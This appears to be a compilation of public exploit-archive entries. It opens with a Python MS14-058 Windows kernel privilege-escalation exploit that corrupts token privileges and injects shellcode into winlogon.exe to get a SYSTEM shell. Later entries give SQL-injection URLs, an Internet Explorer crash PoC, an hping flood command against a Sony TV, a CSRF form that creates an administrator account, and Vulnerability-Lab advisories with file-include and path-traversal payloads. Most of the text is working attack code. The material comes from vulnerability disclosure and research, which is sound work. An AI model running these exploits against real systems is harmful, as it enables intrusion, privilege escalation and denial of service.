kernel32.VirtualAllocEx.argtypes = [HANDLE, LPVOID, DWORD, DWORD,
DWORD]
kernel32.VirtualAllocEx.restype = LPVOID
kernel32.CreateRemoteThread.argtypes = [HANDLE, QWORD, UINT, QWORD,
LPVOID, DWORD, POINTER(HANDLE)]
kernel32.CreateRemoteThread.restype = BOOL
kernel32.CreateToolhelp32Snapshot.argtypes = [DWORD, DWORD]
kernel32.CreateToolhelp32Snapshot.restype = HANDLE
kernel32.CloseHandle.argtypes = [HANDLE]
kernel32.CloseHandle.restype = BOOL
kernel32.Process32First.argtypes = [HANDLE, POINTER(PROCESSENTRY32)]
kernel32.Process32First.restype = BOOL
kernel32.Process32Next.argtypes = [HANDLE, POINTER(PROCESSENTRY32)]
kernel32.Process32Next.restype = BOOL
kernel32.GetCurrentThreadId.restype = DWORD
ntdll.NtAllocateVirtualMemory.argtypes = [HANDLE, LPVOID, ULONG, LPVOID,
ULONG, DWORD]
ntdll.NtAllocateVirtualMemory.restype = NTSTATUS
ntdll.NtQueryObject.argtypes = [HANDLE, DWORD,
POINTER(PUBLIC_OBJECT_TYPE_INFORMATION),
DWORD, DWORD]
ntdll.NtQueryObject.restype = NTSTATUS
ntdll.NtQuerySystemInformation.argtypes = [DWORD,
POINTER(SYSTEM_HANDLE_INFORMATION_EX),
DWORD, POINTER(DWORD)]
ntdll.NtQuerySystemInformation.restype = NTSTATUS
def log(msg, e=None):
if e == "e":
msg = "[!] " + msg
if e == "d":
msg = "[*] " + msg
else:
msg = "[+] " + msg
print msg
def getLastError():
"""Format GetLastError"""
buf = create_string_buffer(2048)
if kernel32.FormatMessageA(FORMAT_MESSAGE_FROM_SYSTEM, NULL,
kernel32.GetLastError(), 0,
buf, sizeof(buf), NULL):
log(buf.value, "e")
else:
log("Unknown Error", "e")
class x_file_handles (Exception):
pass
def get_type_info(handle):
"""Get the handle type information."""
public_object_type_information = PUBLIC_OBJECT_TYPE_INFORMATION()
size = DWORD(sizeof(public_object_type_information))
while True:
result = ntdll.NtQueryObject(handle, ObjectDataInformation,
byref(public_object_type_information), size, 0x0)
if result == STATUS_SUCCESS:
return public_object_type_information.Name.Buffer
elif result == STATUS_INFO_LENGTH_MISMATCH:
size = DWORD(size.value * 4)
resize(public_object_type_information, size.value)
elif result == STATUS_INVALID_HANDLE:
return "INVALID HANDLE: %s" % hex(handle)
else:
raise x_file_handles("NtQueryObject", hex(result))
def get_handles():
"""Return all the open handles in the system"""
system_handle_information = SYSTEM_HANDLE_INFORMATION_EX()
size = DWORD (sizeof (system_handle_information))
while True:
result = ntdll.NtQuerySystemInformation(
SystemExtendedHandleInformation,
byref(system_handle_information),
size,
byref(size)
)
if result == STATUS_SUCCESS:
break
elif result == STATUS_INFO_LENGTH_MISMATCH:
size = DWORD(size.value * 4)
resize(system_handle_information, size.value)
else:
raise x_file_handles("NtQuerySystemInformation", hex(result))
pHandles = cast(
system_handle_information.Handles,
POINTER(SYSTEM_HANDLE_TABLE_ENTRY_INFO_EX * \
system_handle_information.NumberOfHandles)
)
for handle in pHandles.contents:
yield handle.UniqueProcessId, handle.HandleValue, handle.Object
def WndProc(hwnd, message, wParam, lParam):
"""Window procedure"""
global bWndProcFlag
if message == 289 and not bWndProcFlag:
bWndProcFlag = True
user32.PostMessageW(hwnd, 256, 40, 0)
user32.PostMessageW(hwnd, 256, 39, 0)
user32.PostMessageW(hwnd, 513, 0, 0)
return user32.DefWindowProcW(hwnd, message, wParam, lParam)
def hook_callback_one(code, wParam, lParam):
"""Sets a new address for the window procedure"""
global bHookCallbackFlag
if ((cast((lParam+sizeof(HANDLE)*2),PDWORD)).contents).value == 0x1eb and\
not bHookCallbackFlag:
bHookCallbackFlag = True
if user32.UnhookWindowsHook(WH_CALLWNDPROC, CALLBACK01):
# Sets a new address for the window procedure
log("Callback triggered!")
log("Setting the new address for the window procedure...")
lpPrevWndFunc = user32.SetWindowLongPtrW\
((cast((lParam+sizeof(HANDLE)*3),PDWORD).contents).value,
GWLP_WNDPROC, CALLBACK02)
return user32.CallNextHookEx(0, code, wParam, lParam)
def hook_callback_two(hWnd, Msg, wParam, lParam):
"""Once called will return the fake tagWND address"""
global EXPLOITED
user32.EndMenu()
EXPLOITED = True
log("Returning the fake tagWND and overwriting token privileges...")
return 0x00000000FFFFFFFB
def buildMenuAndTrigger():
"""Create menus and invoke TrackPopupMenu"""
global Hmenu01, Hmenu02
log("Creating windows and menus...")
wndClass = WNDCLASS()
wndClass.lpfnWndProc = WNDPROC(WndProc)
wndClass.lpszClassName = u"pwned"
wndClass.cbClsExtra = wndClass.cbWndExtra = 0
# Registering Class
if not user32.RegisterClassW(addressof(wndClass)):
log("RegisterClassW failed", "e")
sys.exit()
# Creating the Window
hWnd = user32.CreateWindowExW(0, u"pwned", u"pwned", 0, -1, -1, 0,
0, NULL, NULL, NULL, NULL)
if not hWnd:
log("CreateWindowExW Failed", "e")
sys.exit()
# Creating popup menu
user32.CreatePopupMenu.restype = HMENU
Hmenu01 = user32.CreatePopupMenu()
if not Hmenu01:
log("CreatePopupMenu failed 0x1", "e")
sys.exit()
Hmenu01Info = MENUITEMINFO()
Hmenu01Info.cbSize = sizeof(MENUITEMINFO)
Hmenu01Info.fMask = MIIM_STRING
# Insert first menu
if not user32.InsertMenuItemW(Hmenu01, 0, True, addressof(Hmenu01Info)):
log("Error in InsertMenuItema 0x1", "e")
user32.DestroyMenu(Hmenu01)
sys.exit()
# Creating second menu
Hmenu02 = user32.CreatePopupMenu()
if not Hmenu02:
log("CreatePopupMenu failed 0x2", "e")
sys.exit()
Hmenu02Info = MENUITEMINFO()
Hmenu02Info.cbSize = sizeof(MENUITEMINFO)
Hmenu02Info.fMask = (MIIM_STRING | MIIM_SUBMENU)
Hmenu02Info.dwTypeData = ""
Hmenu02Info.cch = 1
Hmenu02Info.hSubMenu = Hmenu01
# Insert second menu
if not user32.InsertMenuItemW(Hmenu02, 0, True, addressof(Hmenu02Info)):
log("Error in InsertMenuItema 0x2", "e")
user32.DestroyMenu(Hmenu01)
user32.DestroyMenu(Hmenu01)
sys.exit()
# Set window callback
tid = kernel32.GetCurrentThreadId()
if not user32.SetWindowsHookExW(WH_CALLWNDPROC, CALLBACK01, NULL, tid):
log("Failed SetWindowsHookExA 0x1", "e")
sys.exit()
# Crash it!
log("Invoking TrackPopupMenu...")
user32.TrackPopupMenu(Hmenu02, 0, -10000, -10000, 0, hWnd, NULL)
def alloctagWND():
"""Allocate a fake tagWND in userspace at address 0x00000000fffffff0"""
hProcess = HANDLE(kernel32.GetCurrentProcess())
hToken = HANDLE()
hRestrictedToken = HANDLE()
if not advapi32.OpenProcessToken(hProcess,TOKEN_ALL_ACCESS, byref(hToken)):
log("Could not open current process token", "e")
getLastError()
sys.exit()
if not advapi32.CreateRestrictedToken(hToken, DISABLE_MAX_PRIVILEGE, 0, 0,
0, 0, 0, 0, byref(hRestrictedToken)):
log("Could not create the restricted token", "e")
getLastError()
sys.exit()
if not advapi32.AdjustTokenPrivileges(hRestrictedToken, 1, NULL, 0,
NULL, NULL):
log("Could not adjust privileges to the restricted token", "e")
getLastError()
sys.exit()
# Leak Token addresses in kernel space
log("Leaking token addresses from kernel space...")
for pid, handle, obj in get_handles():
if pid==os.getpid() and get_type_info(handle) == "Token":
if hToken.value == handle:
log("Current process token address: %x" % obj)
if hRestrictedToken.value == handle:
log("Restricted token address: %x" % obj)
RestrictedToken = obj
CurrentProcessWin32Process = "\x00"*8
# nt!_TOKEN+0x40 Privileges : _SEP_TOKEN_PRIVILEGES
# +0x3 overwrite Enabled in _SEP_TOKEN_PRIVILEGES, -0x8 ADD RAX,0x8
TokenAddress = struct.pack("<Q", RestrictedToken+0x40+0x3-0x8)
tagWND = "\x41"*11 + "\x00\x00\x00\x00" +\
"\x42"*0xC + "\xf0\xff\xff\xff\x00\x00\x00\x00" +\
"\x00"*8 +\
"\x43"*0x145 + CurrentProcessWin32Process + "\x45"*0x58 +\
TokenAddress + "\x47"*0x28
## Allocate space for the input buffer
lpBaseAddress = LPVOID(0x00000000fffffff0)
Zerobits = ULONG(0)
RegionSize = LPVOID(0x1000)
written = LPVOID(0)
dwStatus = ntdll.NtAllocateVirtualMemory(0xffffffffffffffff,
byref(lpBaseAddress),
0x0,
byref(RegionSize),
VIRTUAL_MEM,
PAGE_EXECUTE_READWRITE)
if dwStatus != STATUS_SUCCESS:
log("Failed to allocate tagWND object", "e")
getLastError()
sys.exit()
# Copy input buffer to the fake tagWND
nSize = 0x200
written = LPVOID(0)
lpBaseAddress = QWORD(0x00000000fffffff0)
dwStatus = kernel32.WriteProcessMemory(0xffffffffffffffff,
lpBaseAddress,
tagWND,
nSize,
byref(written))
if dwStatus == 0:
log("Failed to copy the input buffer to the tagWND object", "e")
getLastError()
sys.exit()
log("Fake win32k!tagWND allocated, written %d bytes to 0x%x" %\
(written.value, lpBaseAddress.value))
return hRestrictedToken
def injectShell(hPrivilegedToken):
"""Impersonate privileged token and inject shellcode into winlogon.exe"""
while not EXPLOITED:
time.sleep(0.1)
log("-"*70)
log("Impersonating the privileged token...")
if not advapi32.ImpersonateLoggedOnUser(hPrivilegedToken):
log("Could not impersonate the privileged token", "e")
getLastError()
sys.exit()
# Get winlogon.exe pid
pid = getpid("winlogon.exe")
# Get a handle to the winlogon process we are injecting into
hProcess = kernel32.OpenProcess(PROCESS_ALL_ACCESS, False, int(pid))
if not hProcess:
log("Couldn't acquire a handle to PID: %s" % pid, "e")
sys.exit()
log("Obtained handle 0x%x for the winlogon.exe process" % hProcess)
# Creating shellcode buffer to inject into the host process
sh = create_string_buffer(SHELLCODE, len(SHELLCODE))
code_size = len(SHELLCODE)
# Allocate some space for the shellcode (in the program memory)
sh_address = kernel32.VirtualAllocEx(hProcess, 0, code_size, VIRTUAL_MEM,
PAGE_EXECUTE_READWRITE)
if not sh_address:
log("Could not allocate shellcode in the remote process")
getLastError()
sys.exit()
log("Allocated memory at address 0x%x" % sh_address)
# Inject shellcode in to winlogon.exe process space
written = LPVOID(0)
shellcode = QWORD(sh_address)
dwStatus = kernel32.WriteProcessMemory(hProcess, shellcode, sh, code_size,
byref(written))
if not dwStatus:
log("Could not write shellcode into winlogon.exe", "e")
getLastError()
sys.exit()
log("Injected %d bytes of shellcode to 0x%x" % (written.value, sh_address))
# Now we create the remote thread and point its entry routine to be head of
# our shellcode
thread_id = HANDLE(0)
if not kernel32.CreateRemoteThread(hProcess, 0, 0, sh_address, 0, 0,
byref(thread_id)):
log("Failed to inject shellcode into winlogon.exe")
sys.exit(0)
log("Remote thread 0x%08x created" % thread_id.value)
log("Spawning SYSTEM shell...")
# Kill python process to kill the window and avoid BSODs
os.kill(os.getpid(), signal.SIGABRT)
def getpid(procname):
""" Get Process Pid by procname """
pid = None
try:
hProcessSnap = kernel32.CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS, 0)
pe32 = PROCESSENTRY32()
pe32.dwSize = sizeof(PROCESSENTRY32)
ret = kernel32.Process32First(hProcessSnap , byref(pe32))
while ret:
if pe32.szExeFile == LPSTR(procname).value:
pid = pe32.th32ProcessID
ret = kernel32.Process32Next(hProcessSnap, byref(pe32))
kernel32.CloseHandle ( hProcessSnap )
except Exception, e:
log(str(e), "e")
if not pid:
log("Could not find %s PID" % procname)
sys.exit()
return pid
CALLBACK01 = WinFunc1(hook_callback_one)
CALLBACK02 = WinFunc2(hook_callback_two)
if __name__ == '__main__':
log("MS14-058 Privilege Escalation - ryujin <at> offensive-security.com",
"d")
# Prepare the battlefield
hPrivilegedToken = alloctagWND()
# Start the injection thread
t1 = threading.Thread(target=injectShell, args = (hPrivilegedToken,))
t1.daemon = False
t1.start()
# Trigger the vuln
buildMenuAndTrigger()
source: https://www.securityfocus.com/bid/52908/info
TagGator is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
Update Apr 9, 2012: The vendor disputes this issue stating the issue can not be exploited as described, as the reported parameter does not exist.
http://www.example.com/wp-content/plugins/taggator/taggator.php?tagid=[Sql]
source: https://www.securityfocus.com/bid/52897/info
VBulletin is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
A successful exploit may allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
VBulletin 4.1.10 is vulnerable; other versions may also be affected.
http://www.example.com/announcement.php?a=&announcementid=[Sql]
# Exploit Title: Internet Explorer 11 - Crash PoC
# Google Dork: N/A
# Date: 19th May, 2015
# Exploit Author: garage4hackers
# Vendor Homepage: http://garage4hackers.com/showthread.php?t=6246
# Software Link: N/A
# Version: Tested on IE 11
# Tested on: Windows 7
# CVE : N/A
<!doctype html>
<html>
<HEAD><title>case522207.html</title>
<meta http-equiv="Content-type" content="text/html;charset=UTF-8">
<style>
*:nth-child(5)::before {
content: 'moof';
}
*:nth-child(5)::after {
content:'>>';
}
</style>
</HEAD><body>
<script>
elem0 = document.createElementNS('http://www.w3.org/2000/svg', 'svg')
elem1 = document.createElementNS('http://www.w3.org/2000/svg', 'feGaussianBlur')
elem2 = document.createElementNS('http://www.w3.org/2000/svg', 'svg')
elem3 = document.createElement('dd')
elem4 = document.createElement('map')
elem5 = document.createElement('i')
elem6 = document.createElementNS('http://www.w3.org/2000/svg', 'svg')
document.body.appendChild(elem0)
elem0.appendChild(elem1)
elem1.appendChild(elem2)
elem1.appendChild(elem3)
elem1.appendChild(elem4)
elem1.appendChild(elem5)
elem1.appendChild(elem6)
rangeTxt = document.body.createTextRange()
randOldNode = document.documentElement.firstChild
randOldNode.parentNode.replaceChild(elem2, randOldNode)
rangeTxt.moveEnd('sentence', '-20')
</script>
</body></html>
How do I reproduce it?
- It has been discovered, tested & reduced on Win7 32-bit Ultimate and runs successfully anytime.
a) Enable Page Heap # gflags.exe /p /enable iexplore.exe /full
b) Execute runMe.html in WinDbg
c) Tested on Win7 32-bit, Win8.1 32-bit, Win8.1 64-bit (not working on Win8, IE 10)
source: https://www.securityfocus.com/bid/52893/info
Sony Bravia is prone to a remote denial-of-service vulnerability.
Successful attacks will cause the application to crash, creating a denial-of-service condition.
hping -S TV.IP.Address -p anyport -i u1 --flood
<!--
[+] Exploit Title: ManageEngine EventLog Analyzer Version 10.0 Cross Site
Request Forgery Exploit
[+] Date: 31/03/2015
[+] Exploit Author: Akash S. Chavan
[+] Vendor Homepage: https://www.manageengine.com/
[+] Software Link:
https://download.manageengine.com/products/eventlog/91517554/ManageEngine_EventLogAnalyzer_64bit.exe
[+] Version: Version: 10.0, Build Number: 10001
[+] Tested on: Windows 8.1/PostgreSQL
-->
<html>
<body>
<form action="http://127.0.0.1:8400/event/userManagementForm.do" method="POST">
<input type="hidden" name="domainId" value="" />
<input type="hidden" name="roleId" value="" />
<input type="hidden" name="addField" value="true" />
<input type="hidden" name="userType" value="Administrator" />
<input type="hidden" name="userName" value="rooted" />
<input type="hidden" name="pwd1" value="admin" />
<input type="hidden" name="password" value="admin" />
<input type="hidden" name="userGroup" value="Administrator" />
<input type="hidden" name="email" value="" />
<input type="hidden" name="AddSubmit" value="Add User" />
<input type="hidden" name="alpha" value="" />
<input type="hidden" name="userIds" value="" />
<input type="hidden" name="roleName" value="" />
<input type="hidden" name="selDevices" value="" />
<input type="hidden" name="doAction" value="" />
<input type="hidden" name="productName" value="eventlog" />
<input type="hidden" name="licType" value="Prem" />
<input type="hidden" name="next" value="" />
<input type="hidden" name="currentUserId" value="1" />
<input type="hidden" name="isAdminServer" value="false" />
<input type="submit" value="Click Me" />
</form>
</body>
</html>
Document Title:
===============
OYO File Manager 1.1 iOS&Android - Multiple Vulnerabilities
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1494
Release Date:
=============
2015-05-18
Vulnerability Laboratory ID (VL-ID):
====================================
1493
Common Vulnerability Scoring System:
====================================
6.9
Product & Service Introduction:
===============================
OYO File Manager, helps you to manage files in your mobile from your computer over wifi, without USB cable. Also, view your photo albums, play songs and videos.
Store files in drive page and do all the file operations, such as Create, Move, Delete, Edit, Copy, Rename, Zip, unzip, and get information about file.
(Copy of the Vendor Homepage: https://itunes.apple.com/us/app/oyo-file-manager/id981145759 & https://play.google.com/store/apps/details?id=com.whatbig.filemanager )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Core Research team discovered multiple Vulnerabilities in the official OYO File Manager v1.1 iOS & Android mobile web-application.
Vulnerability Disclosure Timeline:
==================================
2015-05-18: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Balaji Rajan
Product: OYO File Manager - iOS & Android 1.1
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
1.1 Local File Include Vulnerability
A local file include web vulnerability has been discovered in the official OYO File Manager v1.1 iOS & Android mobile web-application.
The file include vulnerability allows remote attackers to unauthorized include local file/path requests to compromise the mobile web-application.
The web vulnerability is located in the `filename` value of the `upload(GCDWebUploader)` module. Attackers are able to inject own files with malicious
`filename` values in the `upload` POST method request to compromise the mobile web-application. The local file/path include execution occcurs in
the index file dir listing and sub folders of the wifi interface. The attacker is able to inject the local file include request by usage of the
`wifi interface` in connection with the vulnerable file upload POST method request. Injects are also possible via local file sync function.
Local attackers are also able to exploit the filename issue in combination with persistent injected script code to execute different malicious
attack requests.
The security risk of the local file include vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.5.
Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account.
Successful exploitation of the local file include vulnerability results in mobile application compromise or connected device component compromise.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] upload (GCDWebUploader)
Vulnerable Parameter(s):
[+] filename
Affected Module(s):
[+] Index File Dir Listing (http://localhost:8080/)
1.2 Local Command Injection Vulnerability
A local command inject web vulnerability has been discovered in the official OYO File Manager v1.1 iOS & Android mobile web-application.
The issue allows remote attackers to inject own commands by usage of stable device values to compromise the ios or android mobile web-application.
The command inject vulnerability is located in the vulnerable `devicename` value of the `index` module. Local attackers are able to inject own
own malicious system specific commands to requests the vulnerable `devicename` value. The devicename value is displayed in the header location
of the file dir index module. The execution point is in the main index context and the injection point is the local device to app sync.
The attack vector is located on the application-side and the injection requires physical device access or a local low privileged device user account.
Local attackers are also able to exploit the devicename validation issue in combination with persistent injected script codes.
The security risk of the local command/path inject vulnerability is estimated as medium with a cvss (common vulnerability scoring system) count of 5.6.
Exploitation of the command/path inject vulnerability requires a low privileged ios/android device account with restricted access and no user interaction.
Successful exploitation of the vulnerability results in unauthorized execution of system specific commands to compromise the mobile Android/iOS application
or the connected device components.
Request Method(s):
[+] [SYNC]
Vulnerable Module(s):
[+] Path Listing
Vulnerable Parameter(s):
[+] devicename
1.3 Remote Path Traversal Vulnerability
A Path Traveral web vulnerability has been discovered in the official OYO File Manager v1.1 iOS & Android mobile web-application.
The security vulnerability allows remote attackers to unauthorized request system path variables to compromise the mobile application or device.
The vulnerability is located in the `path` value of the `open and list` interface module. Remote attackers are able to change the path variable
to unauthorized request device files or directories. The vulnerability can be exploited by local or remote attackers without user interaction.
The attack vector is located on the application-side of the service and the request method to execute is GET (client-side).
The security risk of the path traversal web vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.9.
Exploitation of the directory traversal web vulnerability requires no privileged application user account or user interaction.
Successful exploitation of the vulnerability results in mobile application compromise.
Request Method(s):
[+] GET
Vulnerable Module(s):
[+] open
[+] list
Vulnerable Parameter(s):
[+] path
Affected Module(s):
[+] Index File Dir Listing (http://localhost:8080/)
Proof of Concept (PoC):
=======================
1.1
The file include web vulnerability can be exploited by local attackers without privileged application user account or user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Open the interface
2. Start a session tamper
3. Upload a reandom file
4. Change in the upload POST method request the vulnerable filename to a local file variable
Note: The website reloads
5. The execution occurs in the main file dir index were the upload has been replaced
6. Successful reproduce of the mobile web vulnerability!
--- PoC Session Logs [POST] ---
Status: 200[OK]
POST http://localhost/upload
Load Flags[LOAD_BYPASS_CACHE ] Größe des Inhalts[2] Mime Type[application/json]
Request Header:
Host[localhost]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0]
Accept[application/json, text/javascript, */*; q=0.01]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://localhost/]
Content-Length[831]
Content-Type[multipart/form-data; boundary=---------------------------33361466725643]
Connection[keep-alive]
Pragma[no-cache]
Cache-Control[no-cache]
POST-Daten:
POST_DATA[-----------------------------33361466725643
Content-Disposition: form-data; name="path"/test23/
-----------------------------33361466725643
Content-Disposition: form-data; name="files[]"; filename="../[LOCAL FILE INCLUDE VULNERABILITY!]testfile.png"
Content-Type: image/png
- Response
Status=OK - 200
Server=GCDWebUploader
Cache-Control=no-cache
Content-Length=2
Content-Type=application/json
Connection=Close
Date=Tue, 12 May 2015 12:24:23 GMT
Reference(s):
http://localhost/upload
1.2
The local command inject web vulnerability can be exploited by local attackers with low privilege application user account and low user interaction.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
Manual steps to reproduce the vulnerability ...
1. Install the android or ios application to your device
2. Start the application
3. Change the local devicename value in the ios settings to a own payload string (local command inject)
4. Save the settings
5. Open the wifi interface and watch the index webserver site
6. The execution occurs in the header location of the webpage were the devicename value is visible
6. Successful reproduce of the mobile web vulnerability!
PoC:
<spna><img src="img/OYO.png" alt="OYO" style="margin-left:-30px;" height="87" width="87"><span> </span>
<span style="font-size:20px;">[LOCAL COMMAND INJECT VULNERABILITY!]23</span> <span style="font-size: 15px;color: #CCCCCC;">IOS Version 8.3</span>
<span style="float:right;font-size:18px;width:400px;">
<div class="progress">
<div class="progress-bar progress-bar-success" role="progressbar" aria-valuenow="1394098176.00" aria-valuemin="0" aria-valuemax="12.74" style="width:95.22%">
25.89 GB used</div>
<!-- <span style="font-size:10px;padding-left:20px;padding-bottom:5px;"> 1.30 GB Free Space</span>-->
<!-- Drag & drop files OR Just upload your Files-->
<div class="progress-bar progress-bar-warning" role="progressbar" aria-valuenow="25.89 GB" aria-valuemin="0" aria-valuemax="12.74" style="width:4.78%">
1.30 GB free space
</div></div></span></spna>
1.3
the path traversal web vulnerability can be exploited by remote attackers without user interaction or privilege web application user account.
For security demonstration or to reproduce the vulnerability follow the provided information and steps below to continue.
PoC: Payload(s)
http://localhost/list?path=%2F%22%3E%3C../../../../../[DIRECTORY TRAVERSAL]%3E/
http://localhost/open?path=%2F%22%3E%3C../../../../../[DIRECTORY TRAVERSAL]%3E/
http://localhost/download?path=%2F%22%3E%3C../../../../../[DIRECTORY TRAVERSAL]%3E/
--- PoC Session Logs [GET] ---
Status: 200[OK]
GET http://localhost/list?path=%2F%22%3E%3C../../../../../[DIRECTORY TRAVERSAL]%3E/PENG.png
Load Flags[LOAD_BACKGROUND ] Größe des Inhalts[59] Mime Type[application/json]
Request Header:
Host[localhost]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0]
Accept[application/json, text/javascript, */*; q=0.01]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
X-Requested-With[XMLHttpRequest]
Referer[http://localhost/]
Connection[keep-alive]
Response Header:
Server[GCDWebUploader]
Cache-Control[no-cache]
Content-Length[59]
Content-Type[application/json]
Connection[Close]
Date[Tue, 12 May 2015 12:24:25 GMT]
14:21:43.214[9ms][total 9ms] Status: 200[OK]
GET http://localhost/open?path=/%22%3E%3C../../../../../[DIRECTORY TRAVERSAL]%3E/PENG.png Load Flags[LOAD_NORMAL] Größe des Inhalts[538] Mime Type[image/png]
Request Header:
Host[localhost]
User-Agent[Mozilla/5.0 (Windows NT 6.3; WOW64; rv:37.0) Gecko/20100101 Firefox/37.0]
Accept[image/png,image/*;q=0.8,*/*;q=0.5]
Accept-Language[de,en-US;q=0.7,en;q=0.3]
Accept-Encoding[gzip, deflate]
Referer[http://localhost/]
Connection[keep-alive]
Response Header:
Etag[8831597/1431433463/0]
Last-Modified[Tue, 12 May 2015 12:24:23 GMT]
Server[GCDWebUploader]
Content-Type[image/png]
Content-Length[538]
Connection[Close]
Date[Tue, 12 May 2015 12:24:25 GMT]
Cache-Control[no-cache]
Reference(s):
http://localhost/list?path=
http://localhost/open?path=
http://localhost/download?path=
Solution - Fix & Patch:
=======================
1.1
The local file include web vulnerability can be patched by a secure parse and encode of the vulnerable filename value in the upload POST method request.
Restrict the input and disallow special chars. Parse the output in the file dir index list to prevent local file include attacks via upload.
1.2
Restrict the devicename value and disallow special chars. Encode the devicename value to prevent local command injection attacks.
1.3
The directory traversal web vulnerability can be patched by a secure restriction and parse of the path name value in the open and list module context.
Encode the input of files to folders and disallow special chars. Implement a whitelist or a exception to prevent unauthorized path value requests via GET method.
Security Risk:
==============
1.1
The security risk of the local file include web vulnerability in the filename value of the manager is estimated as high. (CVSS 6.5)
1.2
The security risk of the local command inject web vulnerability in the devicename value of the manager is estimated as high. (CVSS 5.6)
1.3
The security risk of the path traversal web vulnerability in the path value of the manager is estimated as high. (CVSS 6.9)
Credits & Authors:
==================
Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@evolution-sec.com) [www.vulnerability-lab.com]
Disclaimer & Information:
=========================
The information provided in this advisory is provided as it is without any warranty. Vulnerability Lab disclaims all warranties, either expressed
or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability-Lab or its suppliers are not liable
in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab
or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for
consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses,
policies, deface websites, hack into databases or trade with fraud/stolen material.
Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.evolution-sec.com
Contact: admin@vulnerability-lab.com - research@vulnerability-lab.com - admin@evolution-sec.com
Section: magazine.vulnerability-db.com - vulnerability-lab.com/contact.php - evolution-sec.com/contact
Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab
Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php
Programs: vulnerability-lab.com/submit.php - vulnerability-lab.com/list-of-bug-bounty-programs.php - vulnerability-lab.com/register/
Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to
electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by
Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, source code, videos and other information on this website
is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact
(admin@vulnerability-lab.com or research@vulnerability-lab.com) to get a permission.
Copyright © 2015 | Vulnerability Laboratory - [Evolution Security GmbH]™
--
VULNERABILITY LABORATORY - RESEARCH TEAM
SERVICE: www.vulnerability-lab.com
CONTACT: research@vulnerability-lab.com
PGP KEY: http://www.vulnerability-lab.com/keys/admin@vulnerability-lab.com%280x198E9928%29.txt
Document Title:
===============
Wireless Photo Transfer v3.0 iOS - File Include Vulnerability
References (Source):
====================
http://www.vulnerability-lab.com/get_content.php?id=1492
Release Date:
=============
2015-05-12
Vulnerability Laboratory ID (VL-ID):
====================================
1492
Common Vulnerability Scoring System:
====================================
6.5
Product & Service Introduction:
===============================
Transfer your photo without usb. The best wireless photo transfer app on the App Store.
(Copy of the Vendor Homepage: https://itunes.apple.com/us/app/wireless-photo-transfer/id900376882 )
Abstract Advisory Information:
==============================
The Vulnerability Laboratory Research Team discovered a local file include vulnerability in the official wireless photo transfer mobile v3.0 iOS application.
Vulnerability Disclosure Timeline:
==================================
2015-05-12: Public Disclosure (Vulnerability Laboratory)
Discovery Status:
=================
Published
Affected Product(s):
====================
Yan Xing
Product: Wireless Photo Transfer - iOS Mobile Web Application 3.0
Exploitation Technique:
=======================
Remote
Severity Level:
===============
High
Technical Details & Description:
================================
A local file include web vulnerability has been discovered in the official wireless photo transfer mobile v3.0 iOS application.
The file include vulnerability allows remote attackers to unauthorized include local file/path requests or system specific
path commands to compromise the mobile web-application.
The web vulnerability is located in the `album-title` value of the `file upload` module. Remote attackers are able to inject
own files with malicious `filename` values in the `file upload` POST method request to compromise the mobile web-application.
The local file/path include execution occcurs in the index file dir listing and sub folders of the wifi interface. The attacker
is able to inject the lfi payload by usage of the wifi interface or local file sync function. Attackers are also able to exploit
the filename issue in combination with persistent injected script code to execute different malicious attack requests. The attack
vector is located on the application-side of the wifi service and the request method to inject is POST.
The security risk of the local file include vulnerability is estimated as high with a cvss (common vulnerability scoring system) count of 6.5.
Exploitation of the local file include web vulnerability requires no user interaction or privileged web-application user account.
Successful exploitation of the local file include vulnerability results in mobile application compromise or connected device component compromise.
Request Method(s):
[+] [POST]
Vulnerable Module(s):
[+] Submit (Upload)
Vulnerable Parameter(s):
[+] filename (album-title)
Affected Module(s):
[+] Index File Dir Listing (http://localhost:80/)
Proof of Concept (PoC):
=======================
The local file include web vulnerability can be exploited by remote attackers without privileged application user account or user interaction.
For security demonstration or to reproduce the security vulnerability follow the provided information and steps below to continue.
PoC: #1 Index File Dir Listing (album-title)
<div class="album-folder">
<div class="album-number">2 items</div>
<div class="album-title">../[LOCAL FILE INCLUDE VULNERABILITY VIA ALBUMNAME!]<a></a></div><a>
</a><a href="/group/2/0/100"><img class="album-overlay" alt="" src="/cvab-overlay.png" height="160" width="140">
